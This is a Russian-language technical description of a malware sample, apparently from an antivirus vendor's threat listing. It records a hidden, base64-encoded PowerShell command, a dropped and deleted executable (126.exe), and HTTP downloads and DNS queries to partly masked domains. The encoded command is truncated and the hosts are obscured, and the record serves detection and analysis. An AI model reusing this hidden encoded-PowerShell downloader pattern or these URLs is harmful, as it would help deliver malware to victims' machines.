Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABFAGYAbQBoAHIAbwBsAGkAdwBrAGwAbgA9ACcASQBsAGQAeQB2AGUAbwBuAHQAcABuAG0AJwA7ACQAUwB5AG4AZQB2AHkAawBkACAAPQAgACcAMQAyADYAJwA7ACQAQgBnAHYAagByAGYAcgBlAGkAPQAnAEgAYQBsAHgAcgBlAG4AdwB...
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\126.exe
Удаляет следующие файлы
- %HOMEPATH%\126.exe
Сетевая активность
TCP
Запросы HTTP GET
- http://ca####resources.com/wp/h6QS56G/
- http://ww#.###iroresources.com/wp/h6QS56G/?su#######################################
- http://is##ue.com/correo/knTR340119/
- http://do###vorot.su/wp-includes/Uz9DnP/
UDP
- DNS ASK da###gks.com
- DNS ASK ca####resources.com
- DNS ASK ww#.###iroresources.com
- DNS ASK id######.agenbolaterbaik.city
- DNS ASK is##ue.com
- DNS ASK do###vorot.su
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABFAGYAbQBoAHIAbwBsAGkAdwBrAGwAbgA9ACcASQBsAGQAeQB2AGUAbwBuAHQAcABuAG0AJwA7ACQAUwB5AG4AZQB2AHkAawBkACAAPQAgACcAMQAyADYAJwA7ACQAQgBnAHYAagByAGYAcgBlAGkAPQAnAEgAYQBsAHgAcgBlAG4AdwB...' (со скрытым окном)
